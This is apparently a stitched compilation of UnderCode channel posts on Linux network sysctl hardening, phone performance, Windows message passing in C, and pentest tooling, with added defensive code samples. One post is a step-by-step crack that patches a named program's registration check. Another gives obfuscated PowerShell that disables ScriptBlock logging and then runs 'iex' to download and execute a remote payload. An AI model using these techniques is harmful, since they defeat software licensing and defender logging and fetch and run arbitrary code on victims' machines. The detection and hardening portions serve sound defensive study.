β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup linux net tips- Kernel network parameters
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
Kernel network parameters also exist per network interface: under /proc/sys/net/ipv4/conf/<DEV>/ you can set a value for one specific interface such as eth0 or eth1. Note: the parameters under /proc/sys/net/ipv4/conf/all/ apply to all interfaces, and the kernel combines the all/ value with the per-interface value (by logical OR or by maximum, depending on the parameter, as described in the kernel's ip-sysctl documentation). A hardening setting should therefore be applied both under all/ and under the specific interface.
1) accept_redirects: located at /proc/sys/net/ipv4/conf/<DEV>/accept_redirects (DEV is the interface name). If there are two routers on your network segment and one of them is your default gateway, then when that gateway receives an IP packet from you that should have gone through the other router, it sends you an ICMP "redirect" telling you to send such packets to the other router instead. The value is boolean: 1 accepts such redirects, 0 ignores them. The default is 0 on a Linux host acting as a router and 1 on an ordinary Linux host. Accepting redirects lets anyone on the segment who can forge an ICMP redirect alter your routing, so it is recommended to set it to 0, or at least to rely on "secure redirects" (see below).
2) log_martians: log IP packets with impossible ("martian") addresses, such as a source address that could not legitimately arrive on that interface, to the kernel log. The value is boolean.
Application:
We talked about the rp_filter reverse-path filter parameter earlier. Alongside it we can run
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
so that packets rejected as IP-spoofed are recorded in /var/log/messages (or wherever your distribution writes the kernel log).
3) forwarding: enable IP forwarding on the specific interface. The value is boolean: 1 enables forwarding on that interface, 0 disables it. Writing to /proc/sys/net/ipv4/conf/all/forwarding (or to /proc/sys/net/ipv4/ip_forward) changes the value for every interface at once.
Application example:
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
4) accept_source_route: whether to accept IP packets carrying source-routing options. The value is boolean: 1 accepts, 0 rejects. The default is 1 on a Linux host acting as a gateway and 0 on an ordinary Linux host. Source routing lets the sender dictate the path a packet takes, which can be used to bypass routing-based access controls, so from a security perspective we recommend turning it off.
5) secure_redirects: we mentioned "secure redirects" above. A "secure redirect" is an ICMP redirect that is accepted only if it comes from a gateway already in the interface's gateway list. This parameter turns that filter on: boolean, 1 enables, 0 disables, default enabled. Note that the check is made on the redirect's source address, which an attacker on the same link can spoof, and that it only matters while accept_redirects is 1; a host that does not need redirects should still set accept_redirects to 0.
6) proxy_arp: whether to answer ARP requests on behalf of other hosts (proxy ARP) on this interface. The value is boolean: 1 enables, 0 disables, default 0. This parameter is usually only useful on a Linux host acting as a router.
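As an added example (not part of the original post), the following POSIX shell script audits the per-interface parameters discussed above against the end-host hardening values the post argues for (accept_redirects=0, accept_source_route=0, log_martians=1, rp_filter=1, forwarding=0, proxy_arp=0), checking both all/ and the named interface, and prints the sysctl.d lines that would enforce them. The function names and the fake directory tree used by the demo are constructed for this example; on a real host you would point the functions at /proc/sys/net/ipv4/conf.

```shell
#!/bin/sh
# Added example, not part of the original post: audit the per-interface IPv4
# parameters discussed above against end-host hardening values and print the
# sysctl.d lines that enforce them. The real conf directory is
# /proc/sys/net/ipv4/conf; the demo below uses a constructed fake tree.

# Hardening target for a host that does not route. rp_filter=1 is the
# reverse-path filter the post refers back to.
RECOMMENDED="accept_redirects=0 accept_source_route=0 log_martians=1 rp_filter=1 forwarding=0 proxy_arp=0"

# audit_iface ROOT IFACE: one line per deviation under ROOT/all and ROOT/IFACE.
# Both scopes are checked because the kernel combines them (logical OR or
# maximum, depending on the parameter), so a weak value in either can win.
audit_iface() {
    root=$1; iface=$2
    for pair in $RECOMMENDED; do
        name=${pair%=*}; want=${pair#*=}
        for scope in all "$iface"; do
            f="$root/$scope/$name"
            if [ ! -r "$f" ]; then
                echo "MISSING $f"
            elif [ "$(cat "$f")" != "$want" ]; then
                echo "WEAK $f=$(cat "$f") want=$want"
            fi
        done
    done
}

# count_deviations ROOT IFACE: number of audit lines; 0 means hardened.
count_deviations() {
    audit_iface "$1" "$2" | wc -l | tr -d ' '
}

# sysctl_fixes IFACE: sysctl.d(5) lines for all/ and IFACE/. The /proc path
# /proc/sys/net/ipv4/conf/<scope>/<name> maps to net.ipv4.conf.<scope>.<name>.
sysctl_fixes() {
    for pair in $RECOMMENDED; do
        for scope in all "$1"; do
            echo "net.ipv4.conf.$scope.${pair%=*} = ${pair#*=}"
        done
    done
}

# make_demo_tree DIR: constructed fake conf tree, hardened except that eth0
# still accepts redirects (the ordinary-host default) and does not log martians.
make_demo_tree() {
    for scope in all eth0; do
        mkdir -p "$1/$scope"
        for pair in $RECOMMENDED; do
            echo "${pair#*=}" > "$1/$scope/${pair%=*}"
        done
    done
    echo 1 > "$1/eth0/accept_redirects"
    echo 0 > "$1/eth0/log_martians"
}

demo=$(mktemp -d)
make_demo_tree "$demo"
audit_iface "$demo" eth0        # two WEAK lines for eth0
echo "deviations: $(count_deviations "$demo" eth0)"
sysctl_fixes eth0 | head -n 4   # start of the remediation file
rm -rf "$demo"
```

On a live system run `audit_iface /proc/sys/net/ipv4/conf eth0` as root and write the output of `sysctl_fixes eth0` to a file under /etc/sysctl.d/ so the values survive a reboot; the `echo 1 > /proc/...` form from the post only lasts until the next boot.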
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
t.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) cleaning up RAM
What is RAM? Think of it as temporary working storage. The more apps you have open, and the heavier each app is, the more RAM is occupied. Only when RAM is full does the phone start to lag badly (so freeing RAM before it is full makes no difference).
2) cleaning up the cache
A cache is content that an app stores temporarily in the phone's storage so it does not have to download it again the next time you look at it. For example, photos in a LINE group that you have already viewed open instantly when you tap them, while a photo you have not yet viewed has to be downloaded before you can see it.
3) hard disk space
Storage space needs little explanation: it is the capacity of the iPhone or Android phone. Although it is measured in GB just like RAM, most phones do not use storage as virtual memory, so free storage is not lent out to RAM.
4) Clean up mobile trash, the difference is in capacity
Imagine your phone is a car. Cleaning up phone junk is like clearing rubbish and dust out of the car: it frees space, but it does not make the car any faster. What actually determines speed is RAM and the processor.
π¦Tips :
If the phone still feels sluggish, "junk" is probably not the cause; the apps you use grow more resource-hungry with every update.
After all, developers always want more features, so software keeps getting heavier.
So if the phone really is very slow, the most direct (and cruel) fix is probably that it is time for a new phone. Reclaiming the phone by clearing junk? I'm afraid that is unlikely.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦from today-posted one :
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
> cvs service-ViewCVS install Howto full by undercode
> LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
> speedup net linux speed- IP related kernel configuration parameters
> speedup linux net tips- Kernel network parameters
> tested 5xGeforce Nvidia Bins
> The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
@UnderCodeTesting - e n j o y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Window, thread, superclass, subclass Full by Undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Windows and messages are covered here for completeness of the narrative, and processes and threads are touched on briefly. Subclassing and superclassing are two ways of reusing code that come with the Windows windowing mechanism. Don't confuse "subclassing" and "superclassing" with derived and base classes in object-oriented languages: the "class" here is the Windows window class.
2) The system creates a message queue for a thread that owns a window, and a thread with a message queue can receive messages; for example, PostThreadMessage posts a message to a thread rather than to a window.
A thread without any window also gets a message queue as soon as it calls PeekMessage or GetMessage.
π¦ Windows and messages
1) Message queue for threads
Each running program is a process. Each process has one or more threads. Some threads have no windows, and some threads have one or more windows.
We can send messages to threads, but most messages are sent to windows. Messages sent to the window are also placed in the thread's message queue. We can think of the thread's message queue as a mailbox and the window as a recipient. When we send a message to a specified window, the system will find the thread to which the window belongs, and then put the message in the thread's message queue.
The thread message queue is an internal system data structure that a program cannot see directly. Through the Windows API, however, we can send and post messages to the queue, retrieve messages from it, and translate and dispatch the retrieved messages.
2) The smallest Windows program
Windows programmers have probably all seen this minimal Windows program:
// Example 1 (built as an ANSI program, i.e. without UNICODE defined)
#include <windows.h>
#include <string.h>

static const char m_szName[] = "window";

// If the window procedure simply forwarded everything to DefWindowProc, the
// message loop would never end when the window is closed, because
// DefWindowProc does not post WM_QUIT.
static LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0);   // post WM_QUIT so GetMessage returns 0 and the loop ends
        break;
    default:
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }
    return 0;
}

// Entry point
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    (void)hPrevInstance;
    (void)lpCmdLine;

    WNDCLASS wc;
    memset(&wc, 0, sizeof(WNDCLASS));
    wc.style = CS_VREDRAW | CS_HREDRAW;
    wc.lpfnWndProc = WindowProc;
    wc.hInstance = hInstance;
    wc.hCursor = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);   // a system colour index used as a brush must be +1
    wc.lpszClassName = m_szName;
    if (!RegisterClass(&wc))   // register the window class
        return 1;

    HWND hWnd = CreateWindow(m_szName, m_szName, WS_OVERLAPPEDWINDOW,
                             100, 100, 320, 240, NULL, NULL, hInstance, NULL);   // create the window
    if (!hWnd)
        return 1;
    ShowWindow(hWnd, nCmdShow);   // show the window

    MSG sMsg;
    BOOL ret;
    while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
    {
        // message loop: GetMessage returns 0 on WM_QUIT and -1 on error
        if (ret != -1)
        {
            TranslateMessage(&sMsg);
            DispatchMessage(&sMsg);
        }
    }
    return 0;
}
3) Although this program does nothing but display a window, it is often used to explain the basic structure of a Windows program, and the same structure can be found inside the MFC framework. It contains the following basic concepts:
the window class, the window procedure and the message loop,
which are introduced below.
4) Window Classes, Windows, and Window Procedures
When creating a window you give the name of a window class. A window class is a template for windows: many windows can be created from the same window class. You can use a window class that Windows registers in advance, but more often you will register your own. When registering a window class you supply its name, style, icon, cursor, menu and so on; the most important item is the address of the window procedure.
5) The window procedure is a function.
All messages received by the window are passed to this function for processing. So how does a message that was placed in the thread's message queue reach the window?
6) Message loop. Programmers familiar with embedded multitasking know that a task (the equivalent of a Windows thread) is basically structured as:
while (1) { wait for signal; process signal; }
The task receives a signal and processes it; otherwise it sleeps and lets other tasks run. This is the basic structure of a message-driven program, and Windows programs do the same:
while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
{
    // message loop
    if (ret != -1)
    {
        TranslateMessage(&sMsg);
        DispatchMessage(&sMsg);
    }
}
GetMessage retrieves a message from the message queue; TranslateMessage turns key-down/key-up messages into WM_CHAR messages and posts them to the queue; DispatchMessage delivers the message to the window identified by the window handle in the message, that is, it calls the window procedure to process the message.
7) Communicating by message
The function that creates a window returns a window handle. A window handle identifies a unique window instance across the whole desktop (not just within one process). By sending messages to the window we can communicate both within a process and between processes.
We can use SendMessage or PostMessage to send or post messages to a window. SendMessage does not return until the target window has processed the message. I tried it: if SendMessage is sent to a window whose thread has no message loop, the SendMessage function never returns. PostMessage returns immediately after placing the message in the thread's message queue. (SendMessageTimeout exists for exactly this situation: it gives up after a timeout instead of hanging the caller on an unresponsive window.)
In fact only posted messages are dispatched to the window procedure through DispatchMessage. A message sent with SendMessage from another thread is handed to the window procedure while the receiving thread is inside GetMessage (or another message-retrieval function), without going through DispatchMessage; a SendMessage from the window's own thread calls the window procedure directly.
π¦ Example of communication between a window program and a console program
Do you think "Example 1" is meaningless? Let's use it to make a small game: have "Example 1" talk to a console program. First we change the window procedure of Example 1 to:
static LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    static DWORD tid = 0;   // thread ID of the console program; 0 until it announces itself
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0);   // post WM_QUIT so the message loop ends when the window is closed
        break;
    case WM_USER:
        tid = (DWORD)wParam;   // save the console program's thread ID
        SetWindowText(hWnd, "Received");
        break;
    case WM_CHAR:
        if (tid)
        {
            switch (wParam)
            {
            case '1':
                PostThreadMessage(tid, WM_USER + 1, 0, 0);   // message 1 to the console program
                break;
            case '2':
                PostThreadMessage(tid, WM_USER + 2, 0, 0);   // message 2 to the console program
                break;
            }
        }
        break;
    default:
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }
    return 0;
}
Then we create a console program with the following code:
#include <windows.h>
#include <stdio.h>

static HWND m_hWnd = NULL;   // main window of the "window" program, found by its title

// Handle the thread messages that wnd posts to us (WM_USER+1 and WM_USER+2).
void process_msg(UINT msg, WPARAM wp, LPARAM lp)
{
    char buf[100];
    static int i = 1;
    (void)wp;
    (void)lp;
    if (!m_hWnd)
        return;
    switch (msg)
    {
    case WM_USER + 1:
        // WM_GETTEXT: wParam is the buffer size in characters, lParam the buffer
        SendMessage(m_hWnd, WM_GETTEXT, sizeof(buf), (LPARAM)buf);
        printf("You are now called: %s\n\n", buf);   // read and display the other side's title
        break;
    case WM_USER + 2:
        snprintf(buf, sizeof(buf), "I am a window %d", i++);
        // WM_SETTEXT ignores wParam; lParam points to the new title
        SendMessage(m_hWnd, WM_SETTEXT, 0, (LPARAM)buf);   // rename the other side
        printf("renamed you\n\n");
        break;
    }
}

int main(void)
{
    MSG sMsg;
    printf("Start with thread id %lu\n", (unsigned long)GetCurrentThreadId());
    // Force creation of this thread's message queue before wnd learns our thread
    // ID: PostThreadMessage fails against a thread that has no message queue yet.
    PeekMessage(&sMsg, NULL, WM_USER, WM_USER, PM_NOREMOVE);
    m_hWnd = FindWindow(NULL, "window");
    if (m_hWnd)
    {
        printf("Found window %p\n\n", (void *)m_hWnd);
        SendMessage(m_hWnd, WM_USER, (WPARAM)GetCurrentThreadId(), 0);   // tell wnd our thread ID
    }
    else
    {
        printf("No window found\n\n");
    }
    BOOL ret;
    while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
    {
        // message loop: thread messages arrive with sMsg.hwnd == NULL
        if (ret != -1)
        {
            process_msg(sMsg.message, sMsg.wParam, sMsg.lParam);
        }
    }
    return 0;
}
7) Can everyone see how to play this game? Run wnd (Example 1) first, then run the console program msg. msg finds wnd's window and sends its main thread ID to wnd; wnd shows "Received" in its title when the message arrives. At this point wnd and msg have a channel in each direction: wnd can post messages to msg's main thread, and msg can send messages to wnd's window.
8) If we press '1' in the wnd window, wnd posts message 1 to msg; msg then fetches wnd's window title with WM_GETTEXT and prints it. If we press '2', wnd posts message 2 to msg; msg then changes wnd's title with WM_SETTEXT.
9) This small example demonstrates a message loop in a console program, posting messages to a thread, and message-based communication between processes. One thing to notice from a security standpoint: any process on the same desktop can FindWindow the title and send WM_USER, and wnd will accept whatever thread ID it is given. Parameters arriving in messages from other processes are untrusted input, and a window procedure should validate them before acting on them.
10) The problem of address space
Different processes have independent address spaces. If we put an address belonging to process A into the message parameters and send the message to process B, and process B then dereferences that address in its own address space, it reads the wrong memory or faults. So why do WM_GETTEXT and WM_SETTEXT in the example above work?
Because WM_GETTEXT and WM_SETTEXT are messages defined by Windows itself. Windows knows what their parameters mean and marshals them: it allocates a relay buffer in process B's address space and copies data between A's buffer and B's. For example, in the example of Section 1.5.1, setting a breakpoint shows that the lParam in the WM_SETTEXT message sent by msg is not equal to the lParam in the WM_SETTEXT message received by wnd.
11) If we pass a memory address in a message we define ourselves, the system does no such processing, so the receiver will fault or read garbage.
Windows provides the WM_COPYDATA message for passing a block of data to a window, and it marshals that message as well. The receiver must treat the data as read-only, copy it out before the window procedure returns, and validate the length and contents, since any process on the desktop can send it.
12) When sending messages between processes that require the system to allocate relay memory, we must use SendMessage rather than PostMessage. SendMessage waits for the receiver to finish processing before it returns, so the system has the opportunity to free the relay buffer. PostMessage with such a message does not deliver it at all: it returns FALSE, and GetLastError reports ERROR_MESSAGE_SYNC_ONLY. The reader can try this in the msg program.
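The following is an added example, not code from the original post: it renames the "window" program through WM_COPYDATA (the marshalled message described in points 11 and 12) instead of WM_SETTEXT, and shows the receiving side treating the COPYDATASTRUCT from the other process as untrusted input. The tag TAG_RENAME, the limit MAX_TITLE and the function names are constructed for this example; the small non-Windows shim is an assumption that only exists so the validation logic can be compiled and tested off Windows.

```c
/* Added example, not part of the original post: renaming the "window" program
 * through WM_COPYDATA instead of WM_SETTEXT, with the receiver validating what
 * an untrusted process handed it. On Windows it builds against <windows.h>;
 * elsewhere a minimal shim (an assumption so the validation logic can be
 * compiled and tested off Windows) defines only the types used. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
typedef uint32_t DWORD;
typedef void *PVOID;
typedef uintptr_t ULONG_PTR;
typedef struct { ULONG_PTR dwData; DWORD cbData; PVOID lpData; } COPYDATASTRUCT;
#endif

#define TAG_RENAME 0x52454E41u   /* 'RENA': constructed tag identifying our payload */
#define MAX_TITLE  64            /* longest title we accept, including the NUL */

/* Receiver side. cds arrives from another process via lParam, so every field is
 * untrusted: the tag, the length and the bytes. The payload is only mapped for
 * the duration of the message, so it is copied into our own buffer before use.
 * Returns 1 and fills title on success, 0 if the message is rejected. */
int accept_copydata(const COPYDATASTRUCT *cds, char *title, size_t title_cap)
{
    if (cds == NULL || title == NULL || title_cap == 0)
        return 0;
    if (cds->dwData != TAG_RENAME)                             /* not our protocol */
        return 0;
    if (cds->lpData == NULL || cds->cbData == 0)
        return 0;
    if (cds->cbData > MAX_TITLE || cds->cbData >= title_cap)   /* peer-supplied length */
        return 0;
    const char *p = (const char *)cds->lpData;
    if (p[cds->cbData - 1] != '\0')                            /* must end with NUL */
        return 0;
    if (strlen(p) != cds->cbData - 1)                          /* no embedded NUL */
        return 0;
    for (size_t i = 0; i + 1 < cds->cbData; i++)
        if (p[i] < 0x20 || p[i] > 0x7E)                        /* printable ASCII only */
            return 0;
    memcpy(title, p, cds->cbData);
    return 1;
}

/* Sender side: describe a title as a COPYDATASTRUCT. Returns 0 if it is too long. */
int build_copydata(const char *title, COPYDATASTRUCT *out)
{
    size_t n = strlen(title) + 1;
    if (n > MAX_TITLE)
        return 0;
    out->dwData = TAG_RENAME;
    out->cbData = (DWORD)n;
    out->lpData = (PVOID)title;
    return 1;
}

#ifdef _WIN32
/* What the receiving window procedure does on WM_COPYDATA. */
static LRESULT CALLBACK RenameProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    if (uMsg == WM_COPYDATA) {
        char title[MAX_TITLE + 1];
        (void)wParam;   /* the sender's HWND, also untrusted; unused here */
        if (accept_copydata((const COPYDATASTRUCT *)lParam, title, sizeof title)) {
            SetWindowTextA(hWnd, title);
            return TRUE;
        }
        return FALSE;
    }
    return DefWindowProcA(hWnd, uMsg, wParam, lParam);
}

/* Sender: find the target by title, as the console program does, and send.
 * SendMessage rather than PostMessage: the system maps lpData into the
 * receiver only for the duration of the call, so the message cannot be posted. */
int send_rename(const char *target_title, const char *new_title)
{
    COPYDATASTRUCT cds;
    HWND h = FindWindowA(NULL, target_title);
    if (h == NULL || !build_copydata(new_title, &cds))
        return 0;
    return SendMessageA(h, WM_COPYDATA, 0, (LPARAM)&cds) ? 1 : 0;
}
#endif
```

The point of accept_copydata is that cbData and lpData are whatever the peer chose to put there: the receiver bounds the length against its own buffer, insists on a terminating NUL and rejects control characters before copying, and it copies rather than keeping the pointer, because the mapping disappears once the window procedure returns.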
π¦ Subclassing and superclassing
A window class is a template for a window, and a window is an instance of a window class. Window class and
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ how to crack the software registration code full by UnderCode :
twitter.com/undercodeNews :
π¦ ππΌππ πππΈβπ :
This is written for readers who have never been exposed to software cracking or programming.
> Let's start today's crack.
> The software to crack: Network Form Terminator. Tools needed:
1) language.exe (packer detection)
2) AspackDie.exe (unpacking)
3) W32Dasm gold version (disassembler)
4) UltraEdit (hex editor)
π¦ Review the basics before cracking:
I. Cracking levels
> Beginner: modify the program, editing the exe file with UltraEdit; this is called brute-force cracking, or "blasting" for short
> Intermediate: trace the software's registration code
> Advanced: write a keygen (registration machine)
π¦ General steps for cracking with w32dasm:
1) Read the software manual: what is the difference between the registered and unregistered versions, and how is registration done?
2) Run the software, try to register with your name and an arbitrary registration code, and write down the error messages that appear
3) Detect whether the file is packed (has a shell)
4) Disassemble it with pw32dasmgold
5) Find the error message, or the message shown on correct registration (use the right mouse button)
6) In the pw32dasmgold main window, analyse the corresponding assembler to identify the key jump and the key call
7) Place the green cursor bar on the key jump; the offset address (the address actually modified) is shown at the bottom of the pw32dasmgold main window
8) Use UltraEdit to locate that offset address (the address actually modified), change the machine code and save
π¦ The concept of the shell: the author wants the copyright information protected and does not want others to change it, so the exe executable is compressed. The most common shell (packer) software: ASPACK, UPX, PEcompact
> Unpacking: obtain the software, detect its shell, and then unpack it to restore its original appearance. If it is not packed, unpacking is not necessary. Unpacking software: unaspack, caspr, upx, unpecompact, procdump
> The address actually modified (offset address) versus the row address (virtual address): the disassembly code produced by pw32dasmgold consists of three columns
the first column is the row address (virtual address)
> the second column is the machine code (this is what is finally modified in UltraEdit)
the third column is the assembly instruction
1) First column   Second column   Third column
:0041BE38         2B45F0          sub eax, dword ptr [ebp-10]
:0041BE3B         6A42            push 00000042
:0041BE3D         50              push eax
:0041BE3E         FF75F4          push [ebp-0C]
:0041BE41         FF75F0          push [ebp-10]
:0041BE44         FF35A8AB4400    push dword ptr [0044ABA8]
2) Different modification methods
for two different situations:
a) Modify to jmp
je (jne, jz, jnz) => jmp, machine code EB (the first jump found going upward from the error message). jmp jumps absolutely and unconditionally, so it skips the error message below it.
b) Modify to nop
je (jne, jz, jnz) => nop, machine code 90 (the first jump found going upward from the correct-registration message). nop erases this jump, making it invalid and losing its function, so that the program proceeds smoothly to the correct-registration message immediately following it.
π¦ Alright, let's start our cracking journey...
1) Investigate the shell: first open the shell detector language.exe, select Open, find the Network Form Terminator to be cracked, FormGhost.exe, and click OK, as shown in Figure 1. language.exe shows that the software's shell is Aspack
2) Unpacking: double-click the unpacker AspackDie.exe; a dialog box appears; select the Network Form Terminator FormGhost.exe and open it
3) Network Form Terminator FormGhost.exe generates an unpacked.exe file in the same directory. This is the unpacked FormGhost.exe.
4) Start disassembly: open the disassembler W32Dasm Gold (the official version is the Chinese version), select Disassembly, open the unpacked.exe produced by unpacking, and let it load
5) Start to modify the software: open the hexadecimal editor UltraEdit.rar (a bit slow to open)
> Open unpacked.exe after unpacking, press ctrl + g directly; a dialog box appears; enter 0xacb4b (that is, the offset address, without the leading 000)
6) Close all software, run the saved unpacked222.exe, click Help --- Registration, enter any registration name and registration code, click OK, and it prompts that registration is complete (Figure 21). Go back to the software interface and look at Help: the registration item has been grayed out
π¦ The cracking is all completed
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PowerShell ScriptBlock Log Bypass by underCode :
twitter.com/undercodeNews
π¦ ππΌππ πππΈβπ :
1) As with any logging facility, ScriptBlock logging is controlled by Group Policy settings. PowerShell consults them every time it encounters a new ScriptBlock to decide whether it needs to be logged. In fact, however, PowerShell performs the query only once, caches the result in memory and returns the cached value on every later access.
2) Thus, these parameters can be changed easily using the following code.
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
3) These actions can be performed without administrator privileges and without touching the registry, which allows this to be done discreetly. But there is one limitation.
4) The new settings are applied only after the check of the parameters that takes place when the first ScriptBlock completes, which will cause that event to be logged. Therefore this trigger ScriptBlock should be as obfuscated as possible and should not carry any payload; it is executed specifically to complete that logging step.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")
5) The above script executes a trigger for the log, checks the logging parameters and launches the payload, bypassing logging.
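From the defender's side, point 4 above means the trigger block itself still reaches the ScriptBlock log, so the tampering can be caught from that one event. The following is an added example, not part of the original post: a Python check that undoes the two obfuscation tricks shown (backtick escapes and 'a'+'b' string splitting) before matching the indicators; the sample ScriptBlockText values are constructed.

```python
import re

# Constructed sample ScriptBlockText values, as a defender would pull them from
# PowerShell 4104 events; not real log records.
SAMPLE_BLOCKS = {
    "plain": (
        "$f = [ref].Assembly.GetType('System.Management.Automation.Utils')"
        ".GetField('cachedGroupPolicySettings', 'NonPublic,Static')"
    ),
    "obfuscated": (
        "[ref].Assembly.GetType('System.Management.Automation.Utils').\"GetFie`ld\""
        "('cachedGroupPolicySettings', 'N'+'onPublic,Static'); "
        "$c['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0"
    ),
    "benign": "Get-ChildItem -Path $env:TEMP | Where-Object { $_.Length -gt 1MB }",
}

# Lower-case indicators of the technique: the private cache field, the two
# policy keys it overwrites, and the type the field is read from.
INDICATORS = [
    "cachedgrouppolicysettings",
    "enablescriptblocklogging",
    "enablescriptblockinvocationlogging",
    "system.management.automation.utils",
]

# Two adjacent single-quoted literals joined with '+'.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize(script: str) -> str:
    """Undo the obfuscation tricks used above so plain substring matching works.

    1. Drop backticks: inside a double-quoted string a backtick before an
       ordinary letter is a no-op escape ("GetFie`ld" is GetField). This also
       removes real escapes such as `n, which is acceptable for matching.
    2. Fold 'a'+'b' into 'ab', repeatedly, so split keys reassemble.
    3. Lower-case everything, since PowerShell identifiers are case-insensitive.
    """
    text = script.replace("`", "")
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if folded == text:
            break
        text = folded
    return text.lower()


def find_indicators(script: str) -> list:
    """Return the indicators present in the normalized script, in INDICATORS order."""
    normalized = normalize(script)
    return [ind for ind in INDICATORS if ind in normalized]


def is_logging_tamper(script: str) -> bool:
    """Flag a block that reaches the cache field and at least one other indicator."""
    hits = find_indicators(script)
    return "cachedgrouppolicysettings" in hits and len(hits) >= 2


if __name__ == "__main__":
    for name, block in SAMPLE_BLOCKS.items():
        print(f"{name:10s} tamper={is_logging_tamper(block)} hits={find_indicators(block)}")
```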
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ You can upload these scripts to a git repo and start some helpful scripts with a few customizations
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Lalin: this script automatically installs packages for pentesting with up-to-date tools, and provides lazy commands for running the tools (such as lazynmap), installing others and updating to new versions. #actually for lazy people hahaha #and Lalin is a remake of lazykali with fixed bugs, added new features and up-to-date tools. It's compatible with the latest release of Kali
pinterest.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/Screetsec/LALIN
2) cd LALIN
3) sudo chmod +x Lalin.sh
4) sudo ./Lalin.sh
π¦Tested by UnderCode
> Kali, on the GNOME desktop
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated 2020: generate and search a pattern string for exploit development
twitter.com/unDERCODENews
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/Svenito/exploit-pattern
2) cd exploit-pattern
3) Generate a pattern
$> pattern.py 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
4) Search for a pattern
$> pattern.py Bf4B
Pattern Bf4B first occurrence at position 942 in pattern.
5) Search by a hex value as it appears in a register (little-endian byte order)
$> pattern.py 0x42346642
Pattern 0x42346642 first occurrence at position 942 in pattern.
6) Use it in your own Python code
After placing pattern.py in the same directory as your script:
from pattern import pattern_gen
print(pattern_gen(10))
or
from pattern import pattern_search
found_at = pattern_search('Bf4B')
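The pattern above is the classic three-character cyclic pattern (uppercase, lowercase, digit). What follows is an added example, not the exploit-pattern project's own code: a self-contained reimplementation of pattern_gen and pattern_search that also accepts the 0x... form, decoding the value as little-endian bytes, which is why 0x42346642 and Bf4B both resolve to offset 942.

```python
import string

# Character classes of the cyclic pattern: the triplet counter advances the
# digit fastest, then the lowercase letter, then the uppercase letter.
_UPPER = string.ascii_uppercase
_LOWER = string.ascii_lowercase
_DIGIT = string.digits

# Full pattern before it would repeat: 26 * 26 * 10 triplets = 20280 characters.
_FULL = "".join(up + lo + dg for up in _UPPER for lo in _LOWER for dg in _DIGIT)
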